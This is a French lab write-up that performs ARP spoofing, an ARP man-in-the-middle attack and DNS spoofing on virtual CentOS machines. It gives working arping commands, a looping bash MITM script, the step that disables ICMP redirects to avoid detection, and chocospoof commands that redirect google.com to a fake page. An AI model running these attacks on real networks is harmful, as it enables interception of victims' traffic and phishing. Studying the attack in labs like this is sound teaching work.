# ARP man-in-the-middle

- [ARP man-in-the-middle](#arp-man-in-the-middle)
  - [1. Détail du setup](#1-détail-du-setup)
  - [2. A la main](#2-a-la-main)
    - [A. ARP spoof](#a-arp-spoof)
    - [B. ARP MITM](#b-arp-mitm)
  - [3. Avec un outil](#3-avec-un-outil)
    - [A. ARP spoof](#a-arp-spoof-1)
    - [B. ARP MITM](#b-arp-mitm-1)
    - [C. DNS spoof](#c-dns-spoof)

## 1. Détail du setup

> L'attaque a été réalisée dans un environnement virtualisé avec VirtualBox. Les machines sont des machines CentOS7. La gateway est la **vraie** gateway des machines.

Pour la suite, on considère 3 machines :

| Machine   | IP          | MAC                 |
|-----------|-------------|---------------------|
| attaquant | `10.3.1.11` | `08:00:27:b1:0e:26` |
| gateway   | `10.3.1.12`  | `08:00:27:66:49:c3` |
| victime   | `10.3.1.13` | `08:00:27:76:ec:f6` |

**Attaquant :**

```bash
$ ip a
[...]
3: enp0s8: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 08:00:27:b1:0e:26 brd ff:ff:ff:ff:ff:ff
    inet 10.3.1.11/24 brd 10.3.1.255 scope global noprefixroute enp0s8
       valid_lft forever preferred_lft forever
    inet6 fe80::a00:27ff:feb1:e26/64 scope link 
       valid_lft forever preferred_lft forever

$ ip r s
default via 10.3.1.12 dev enp0s8 
10.3.1.0/24 dev enp0s8 proto kernel scope link src 10.3.1.11 metric 101 

$ traceroute 8.8.8.8 -m 2
traceroute to 8.8.8.8 (8.8.8.8), 2 hops max, 60 byte packets
 1  gateway (10.3.1.12)  1.927 ms  1.403 ms  1.184 ms
 2  10.0.2.2 (10.0.2.2)  1.609 ms  1.067 ms  0.768 ms
```
---

**Victime :**
```bash
$ ip a 
[...]
3: enp0s8: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 08:00:27:76:ec:f6 brd ff:ff:ff:ff:ff:ff
    inet 10.3.1.13/24 brd 10.3.1.255 scope global noprefixroute enp0s8
       valid_lft forever preferred_lft forever
    inet6 fe80::a00:27ff:fe76:ecf6/64 scope link 
       valid_lft forever preferred_lft forever

$ ip r s
default via 10.3.1.12 dev enp0s8 
10.3.1.0/24 dev enp0s8 proto kernel scope link src 10.3.1.13 metric 101 

$ traceroute 8.8.8.8 -m 2
traceroute to 8.8.8.8 (8.8.8.8), 2 hops max, 60 byte packets
 1  gateway (10.3.1.12)  1.391 ms  0.842 ms  0.757 ms
 2  10.0.2.2 (10.0.2.2)  1.399 ms  4.155 ms  4.039 ms
```

---

**Gateway :**

> `enp0s3` est l'interface NATée vers l'extérieur. La gateway de ce réseau est en `10.0.2.2`.

```bash
$ ip a 
[...]
2: enp0s3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 08:00:27:25:86:99 brd ff:ff:ff:ff:ff:ff
    inet 10.0.2.15/24 brd 10.0.2.255 scope global noprefixroute dynamic enp0s3
       valid_lft 86138sec preferred_lft 86138sec
    inet6 fe80::a3d4:6943:55e7:d7da/64 scope link noprefixroute 
       valid_lft forever preferred_lft forever
3: enp0s8: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 08:00:27:66:49:c3 brd ff:ff:ff:ff:ff:ff
    inet 10.3.1.12/24 brd 10.3.1.255 scope global noprefixroute enp0s8
       valid_lft forever preferred_lft forever
    inet6 fe80::a00:27ff:fe66:49c3/64 scope link 
       valid_lft forever preferred_lft forever

$ ip r s
default via 10.0.2.2 dev enp0s3 proto dhcp metric 100 
10.0.2.0/24 dev enp0s3 proto kernel scope link src 10.0.2.15 metric 100 
10.3.1.0/24 dev enp0s8 proto kernel scope link src 10.3.1.12 metric 101 

$ traceroute 8.8.8.8 -m 2
traceroute to 8.8.8.8 (8.8.8.8), 2 hops max, 60 byte packets
 1  gateway (10.0.2.2)  1.310 ms  0.815 ms  1.209 ms
 2  livebox.home (192.168.1.1)  7.290 ms  6.341 ms  4.329 ms
```

---

## 2. A la main

> La source est [l'article fourni dans le TP](https://sandilands.info/sgordon/arp-spoofing-on-wired-lan).

L'attaque est réalisée avec l'outil `arping` et du scripting `bash`.

Préparation sur la machine attaquante :
```bash
sudo sysctl -w net.ipv4.ip_nonlocal_bind=1
sudo sysctl -w net.ipv4.ip_forward=1
```

### A. ARP spoof

**Sur la victime :**
```bash
$ ip n s   # affiche la table ARP
10.3.1.12 dev enp0s8 lladdr 08:00:27:66:49:c3 STALE
```

**Sur l'attaquant :**
```bash
# Usurpation de l'identité d'IPs inexistantes ou non locales
$ sudo arping -c 1 -U -s 7.7.7.7 -I enp0s8 10.3.1.13
ARPING 10.3.1.13 from 7.7.7.7 enp0s8
Sent 1 probes (1 broadcast(s))
Received 0 response(s)

$ sudo arping -c 1 -U -s 10.3.1.250 -I enp0s8 10.3.1.13
ARPING 10.3.1.13 from 10.3.1.250 enp0s8
Sent 1 probes (1 broadcast(s))
Received 0 response(s)
```

**Sur la victime :**
```bash
$ ip n s
10.3.1.250 dev enp0s8 lladdr 08:00:27:b1:0e:26 STALE
10.3.1.12 dev enp0s8 lladdr 08:00:27:66:49:c3 STALE
7.7.7.7 dev enp0s8 lladdr 08:00:27:b1:0e:26 STALE
```

**Sur l'attaquant :**
```bash
# Usurpation de l'identité de la gateway
$ sudo arping -c 1 -U -s 10.3.1.12 -I enp0s8 10.3.1.13
ARPING 10.3.1.13 from 10.3.1.12 enp0s8
Sent 1 probes (1 broadcast(s))
Received 0 response(s)
```

**Sur la victime :**
```bash
$ ip n s
10.3.1.250 dev enp0s8 lladdr 08:00:27:b1:0e:26 STALE
10.3.1.12 dev enp0s8 lladdr 08:00:27:b1:0e:26 STALE
7.7.7.7 dev enp0s8 lladdr 08:00:27:b1:0e:26 STALE
```

### B. ARP MITM

**Sur l'attaquant :**
```bash
# Création d'un script bash
$ cat mitm.sh 
#!/bin/bash
# it4
# Simple ARP MITM

[[ $(id -u) -ne 0 ]] && echo "This script must be run as root." && exit 1

[[ $(sysctl net.ipv4.ip_forward -n) -ne 1 ]] && echo "You must enable IPv4 forwarding : 'sudo sysctl -w net.ipv4.ip_forward=1'."
[[ $(sysctl net.ipv4.ip_nonlocal_bind -n) -ne 1 ]] && echo "You must enable IPv4 non-local bind : 'sudo sysctl -w net.ipv4.ip_nonlocal_bind=1'."

while :
do
  arping -c 1 -U -s 10.3.1.12 -I enp0s8 10.3.1.13 
  arping -c 1 -U -s 10.3.1.12 -I enp0s8 10.3.1.1
  sleep 1
done
```

**Sur la victime :**
```bash
$ ping 8.8.8.8
PING 8.8.8.8 (8.8.8.8) 56(84) bytes of data.
64 bytes from 8.8.8.8: icmp_seq=1 ttl=61 time=17.8 ms
64 bytes from 8.8.8.8: icmp_seq=2 ttl=61 time=17.4 ms
64 bytes from 8.8.8.8: icmp_seq=3 ttl=61 time=18.7 ms
64 bytes from 8.8.8.8: icmp_seq=4 ttl=61 time=18.9 ms
```

**Sur l'attaquant :**
```bash
# Exécution de l'attaque
sudo ./mitm.sh
```

**Sur la victime :**
```bash
$ ping 8.8.8.8
PING 8.8.8.8 (8.8.8.8) 56(84) bytes of data.
64 bytes from 8.8.8.8: icmp_seq=1 ttl=60 time=19.8 ms
From 10.3.1.11 icmp_seq=2 Redirect Host(New nexthop: 10.3.1.12)
From 10.3.1.11: icmp_seq=2 Redirect Host(New nexthop: 10.3.1.12)
64 bytes from 8.8.8.8: icmp_seq=2 ttl=60 time=19.1 ms
64 bytes from 8.8.8.8: icmp_seq=3 ttl=60 time=18.4 ms
From 10.3.1.11 icmp_seq=4 Redirect Host(New nexthop: 10.3.1.12)
```

**HA !** C'est cramé ça les ICMP redirect. C'est un comportement natif de certains systèmes qui consistent à informer une machine donnée *via* ICMP qu'il existe un chemin plus court pour joindre la destination. Effectivement, inutile de passer par l'attaquant pour joindre la gateway. Pour empêcher notre machine attaquante d'envoyer ces ICMP redirect :
```bash
# Désactivation de l'ICMP redirect
$ echo 0 | sudo tee /proc/sys/net/ipv4/conf/*/send_redirects

# On relance l'attaque
$ sudo ./mitm.sh

# Capture du trafic
$ sudo tcpdump -n -nn -i enp0s8 icmp
```

**Sur la victime :**
```bash
$ ip n s
10.3.1.12 dev enp0s8 lladdr 08:00:27:b1:0e:26 STALE

$ ping 8.8.8.8
PING 8.8.8.8 (8.8.8.8) 56(84) bytes of data.
64 bytes from 8.8.8.8: icmp_seq=1 ttl=60 time=19.5 ms
64 bytes from 8.8.8.8: icmp_seq=2 ttl=60 time=17.1 ms
64 bytes from 8.8.8.8: icmp_seq=3 ttl=60 time=18.3 ms
64 bytes from 8.8.8.8: icmp_seq=4 ttl=60 time=19.4 ms
64 bytes from 8.8.8.8: icmp_seq=5 ttl=60 time=18.5 ms
```

**Sur l'attaquant :**
```bash
$ sudo tcpdump -n -nn -i enp0s8 icmp
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on enp0s8, link-type EN10MB (Ethernet), capture size 262144 bytes
23:01:38.753382 IP 10.3.1.13 > 8.8.8.8: ICMP echo request, id 1690, seq 1, length 64
23:01:38.753533 IP 10.3.1.13 > 8.8.8.8: ICMP echo request, id 1690, seq 1, length 64
23:01:39.755880 IP 10.3.1.13 > 8.8.8.8: ICMP echo request, id 1690, seq 2, length 64
23:01:39.755980 IP 10.3.1.13 > 8.8.8.8: ICMP echo request, id 1690, seq 2, length 64
23:01:40.758171 IP 10.3.1.13 > 8.8.8.8: ICMP echo request, id 1690, seq 3, length 64
23:01:40.758272 IP 10.3.1.13 > 8.8.8.8: ICMP echo request, id 1690, seq 3, length 64
```

## 3. Avec un outil

Hey y'a un outil rigolo. Ca s'appelle [`chocospoof`](https://gitlab.com/chocospoof/chocospoof) (développé avec Scapy).

Pour éviter les problèmes de dépendances, je vais utiliser un autre OS que CentOS7 pour la machine attaquante.

Nouvelle IP de l'attaquant `10.3.1.1`, MAC `0a:00:27:00:00:08`.

**Sur l'attaquant :**
```bash
# Installation de chocospoof
$ git clone https://gitlab.com/chocospoof/chocospoof.git
$ cd chocospoof
$ make install
```

### A. ARP spoof

> A réaliser depuis le répertoire de chocospoof. Je vais pas redétailler ici, ça a le même effet que `arping`.

```bash
$ sudo ./venv/bin/chocospoof arpspoof -g 10.3.1.12 10.3.1.13
```

### B. ARP MITM

> A réaliser depuis le répertoire de chocospoof. Je vais pas redétailler ici, ça a le même effet que `arping` + le script `bash`

```bash
# On lance l'attaque
$ sudo ./venv/bin/chocospoof arpmitm -g 10.3.1.12 10.3.1.13

# Visualisation du fichier d'état (pratique si on lance plusieurs attaques MITM)
$ cat /tmp/chocospoof-arpmitm.state  | jq
{
  "37523": {
    "timestamp": "Wed Mar 25 23:34:10 2020",
    "victim": "10.3.1.13",
    "gateway": "10.3.1.12"
  }
}

# Désactiver l'attaque
$ sudo ./venv/bin/chocospoof arpmitm -g 10.3.1.12 10.3.1.13 -d
```

### C. DNS spoof

Histoire de vraiment rigoler, on va monter un faux serveur **sur l'attaquant**, où le client sera redirigé.

Mille et une façons de faire, ayant déjà docker d'installé, je vais simplement lancer un conteneur NGINX, avec une page d'accueil personnalisée :
```bash
# Création d'une page d'accueil HTML
$ echo "EVIL PAGE" > /tmp/index.html

# Lancement de NGINX pour servir cette page d'accueil
$ docker run -d -p 80:80 -v /tmp/index.html:/usr/share/nginx/html/index.html nginx
```

---

> A réaliser depuis le répertoire de chocospoof.
```bash
# Lancer une attaque MITM
$ sudo ./venv/bin/chocospoof arpmitm -g 10.3.1.12 10.3.1.13  

# Lancer un DNS Spoof
$ sudo ./venv/bin/chocospoof -v dnsspoof -d google.com -g 10.3.1.12 10.3.1.1 10.3.1.13
```

**Sur le client :**
```bash
$ curl google.com
EVIL PAGE
```
